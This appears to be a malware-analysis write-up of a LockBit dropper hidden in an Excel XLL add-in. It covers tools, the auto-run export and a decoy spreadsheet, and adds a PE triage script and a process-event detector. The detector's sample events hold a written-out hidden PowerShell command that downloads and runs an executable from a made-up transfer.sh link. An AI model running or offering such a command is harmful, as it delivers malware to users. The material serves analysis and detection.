LockBit Ransomware - XLL Document Malware Analysis

  • Published 2 Oct 2024
  • LockBit is spreading their Ransomware via an XLL document which executes a dropper.
    Support us on GH: guidedhacking....
    Support us on Patreon: / guidedhacking
    Support us on YT: / @guidedhacking
    In the video we said that PEStudio uploads files to VirusTotal; this is not true. It just searches for the hash. Sorry for the confusion.
    LockBit Malware Analysis - XLL Document Dropper
    guidedhacking....
    We'll begin our LockBit malware analysis by examining the concept of XLL files. An XLL is a DLL that Excel loads as an add-in; it exposes a small set of well-known exports, and Excel calls xlAutoOpen automatically as soon as the add-in is loaded. For our LockBit ransomware investigation, we'll use PEStudio to assess the XLL file. Examining the exports in PEStudio, xlAutoOpen turns up. Every XLL exports it, but it is the hook that runs without any further user interaction, which is exactly why droppers put their code there, so it is the first place to look.
    Threat actors using XLL files often store the next stage of malware in the PE resources. PEStudio lists three resources. The first are Excel-DNA resources, which any add-in built with the Excel-DNA framework carries, so they are not malicious in themselves. The second is oddly named and unrelated to Excel-DNA, which is suspicious. Dump the third and analyze it to determine whether it is the embedded payload.
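    The export-table check above is easy to automate for a whole directory of suspect add-ins. The following is an added example, not code from the video or from GuidedHacking: a stdlib-only Python triage script that parses a PE export table (PE32 and PE32+), reports which of the documented XLL entry points are present and flags xlAutoOpen as the auto-run hook. Because no real sample can be shipped here, the block also builds a constructed minimal DLL containing only an export table, so the check runs offline; the export list, file name and RVAs in that builder are made up. Resource extraction is left to PEStudio as described above.

```python
import struct

# Exports that the Excel add-in (XLL) interface defines. xlAutoOpen is the one
# Excel calls as soon as the add-in is loaded, so it is the auto-run hook.
XLL_EXPORTS = {
    "xlAutoOpen", "xlAutoClose", "xlAutoAdd", "xlAutoRemove",
    "xlAutoRegister12", "xlAutoFree12", "xlAddInManagerInfo", "xlAddInManagerInfo12",
}


def parse_export_names(data: bytes) -> list[str]:
    """Return the exported function names of a PE image (PE32 or PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    # Data directories start at +96 (PE32) or +112 (PE32+); entry 0 is the export table.
    dd = opt + (112 if magic == 0x20B else 96)
    export_rva, _export_size = struct.unpack_from("<II", data, dd)
    if export_rva == 0:
        return []
    # The section table follows the optional header; it maps RVAs to file offsets.
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append((va, max(vsize, rawsize), rawptr))

    def rva_to_offset(rva: int) -> int:
        for va, size, rawptr in sections:
            if va <= rva < va + size:
                return rawptr + (rva - va)
        raise ValueError(f"RVA {rva:#x} not backed by any section")

    exp = rva_to_offset(export_rva)
    (_, _, _, _, _name, _base, _nfuncs, nnames,
     _aof, names_rva, _ords) = struct.unpack_from("<IIHHIIIIIII", data, exp)
    names = []
    for i in range(nnames):
        name_rva = struct.unpack_from("<I", data, rva_to_offset(names_rva) + 4 * i)[0]
        start = rva_to_offset(name_rva)
        names.append(data[start:data.index(b"\0", start)].decode("ascii"))
    return names


def triage_xll(data: bytes) -> dict:
    """Classify a DLL as an XLL add-in and flag its auto-run entry point."""
    names = parse_export_names(data)
    hooks = sorted(n for n in names if n in XLL_EXPORTS)
    return {"exports": names, "xll_hooks": hooks,
            "is_xll": bool(hooks), "auto_exec": "xlAutoOpen" in names}


def build_sample_dll(export_names: list[str]) -> bytes:
    """Constructed minimal PE32+ DLL with only an export table (test input, not real malware)."""
    sec_rva, sec_raw = 0x1000, 0x200          # made-up section RVA and raw offset
    n = len(export_names)
    aof, aon, aoo = 40, 40 + 4 * n, 40 + 8 * n  # function/name/ordinal arrays after the 40-byte directory
    strings_off = 40 + 10 * n
    blob = b"sample.xll\0"                    # made-up DLL name
    name_rvas = []
    for name in export_names:
        name_rvas.append(sec_rva + strings_off + len(blob))
        blob += name.encode("ascii") + b"\0"
    body = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, sec_rva + strings_off, 1, n, n,
                       sec_rva + aof, sec_rva + aon, sec_rva + aoo)
    body += b"".join(struct.pack("<I", 0x2000 + 16 * i) for i in range(n))  # fake code RVAs
    body += b"".join(struct.pack("<I", r) for r in name_rvas)
    body += b"".join(struct.pack("<H", i) for i in range(n))
    body += blob
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)                    # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)       # x64 DLL, 1 section
    datadirs = struct.pack("<II", sec_rva, len(body)) + bytes(8 * 15)     # export dir only
    opt = struct.pack("<H", 0x20B) + bytes(106) + struct.pack("<I", 16) + datadirs
    sechdr = b".rdata\0\0" + struct.pack("<IIIIIIHHI", len(body), sec_rva, len(body),
                                         sec_raw, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + coff + opt + sechdr
    return headers.ljust(sec_raw, b"\0") + body


if __name__ == "__main__":
    print(triage_xll(build_sample_dll(["xlAutoOpen", "xlAutoClose", "xlAddInManagerInfo12"])))
```

    On a real file, pass `open(path, "rb").read()` to `triage_xll`. `is_xll` tells you the DLL is an add-in at all; `auto_exec` tells you Excel will run code on load, which is the cue to open xlAutoOpen in a disassembler (or, for an Excel-DNA build, to go straight to the resources). The parser deliberately ignores forwarded exports and ordinal-only exports, which is enough for this triage but not for a general export walker.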
    Running Detect It Easy (DIE) on the dumped file shows that it is a .NET binary obfuscated with ConfuserEx. To analyze it, a modified version of de4dot is needed to deobfuscate it. Then dnSpy can be used to begin the analysis of the LockBit dropper, which contains obfuscated strings and two ShellExecute calls.
    Decoding the strings reveals a call to powershell.exe that uses the BitsTransfer module (Start-BitsTransfer) to download another binary and then runs it from the same PowerShell command. That file, the LockBit payload, is fetched from transfer.sh. Additionally, using dnSpy, an .xlsx file can be extracted from the binary's resources: this is a decoy spreadsheet shown to the victim when the add-in runs, so that opening the downloaded file looks legitimate.
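    The execution chain above (Excel loads the add-in, the .NET dropper launches powershell.exe, PowerShell pulls the payload over BITS from transfer.sh and starts it) is easier to catch in process-creation telemetry than in the obfuscated binary. The following is an added example, not from the video or from GuidedHacking: a small Python detector run over constructed process-creation events. The command lines, paths, file names and the transfer.sh URL are made up to resemble the described chain; the actual LockBit command line is not reproduced here, and the threshold of three matching indicators is an assumption to tune against your own baseline.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record (Sysmon EventID 1 / EDR equivalent), fields only."""
    parent_image: str
    image: str
    command_line: str


# Each indicator corresponds to one step of the chain described above.
BITS_DOWNLOAD = re.compile(r"\bStart-BitsTransfer\b|\bImport-Module\s+BitsTransfer\b", re.I)
FILE_HOST = re.compile(r"https?://(?:[\w.-]+\.)?transfer\.sh/", re.I)
EXECUTE = re.compile(r"\bStart-Process\b|\bInvoke-Item\b|(?:^|[;&|]\s*)&\s*['\"]", re.I)
HIDE_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile\b|ep\s+bypass|ExecutionPolicy\s+Bypass)", re.I)
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the list of indicators a PowerShell process-creation event matches."""
    reasons = []
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return reasons
    if _basename(ev.parent_image) in OFFICE_PARENTS:
        reasons.append("PowerShell spawned by an Office process")
    if BITS_DOWNLOAD.search(ev.command_line):
        reasons.append("BITS download driven from PowerShell")
    if FILE_HOST.search(ev.command_line):
        reasons.append("fetch from transfer.sh")
    if EXECUTE.search(ev.command_line):
        reasons.append("downloaded file executed in the same command")
    if HIDE_FLAGS.search(ev.command_line):
        reasons.append("hidden window / execution-policy bypass flags")
    return reasons


def detect(events, threshold: int = 3):
    """Return (event, reasons) pairs for events matching at least `threshold` indicators."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev, reasons))
    return hits


# Constructed sample events; the first imitates the dropper chain, the others are benign.
SAMPLE_EVENTS = [
    ProcessEvent(
        parent_image="C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
        image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        command_line='powershell.exe -nop -w hidden -c "Import-Module BitsTransfer; '
                     'Start-BitsTransfer -Source https://transfer.sh/abcd/update.exe '
                     '-Destination $env:TEMP\\update.exe; Start-Process $env:TEMP\\update.exe"'),
    ProcessEvent(
        parent_image="C:\\Windows\\explorer.exe",
        image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        command_line='powershell.exe -c "Get-Service | Where-Object Status -eq Running"'),
    ProcessEvent(
        parent_image="C:\\Windows\\System32\\cmd.exe",
        image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        command_line='powershell.exe -c "Start-BitsTransfer -Source '
                     'https://files.example.internal/patch.msi -Destination C:\\Temp\\patch.msi"'),
]


if __name__ == "__main__":
    for ev, reasons in detect(SAMPLE_EVENTS):
        print(_basename(ev.parent_image), "->", _basename(ev.image))
        for r in reasons:
            print("  -", r)
```

    The third sample shows why a single indicator is not enough: Start-BitsTransfer is a legitimate admin cmdlet, so it scores one point and stays below the threshold, while the dropper chain hits all five. The Office-parent indicator is the one that survives a change of file host, which is why it is worth keeping even after transfer.sh is gone.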
    Follow us on Facebook : bit.ly/2vvHfhk
    Follow us on Twitter : bit.ly/3bC7J1i
    Follow us on Twitch : bit.ly/39ywOZ2
    Follow us on Reddit : bit.ly/3bvOB57
    Follow us on GitHub : bit.ly/2HoNXIS
    Follow us on Instagram : bit.ly/2SoDOlu
    lockbit virus
    malware analysis
    lockbit ransomware removal
    lockbit ransomware analysis
    lockbit ransomware gang
    cyber security
    xll document
    malware
    lockbit ransom
    lockbit ransomware decrypt
    ransomware explained
    reverse engineering
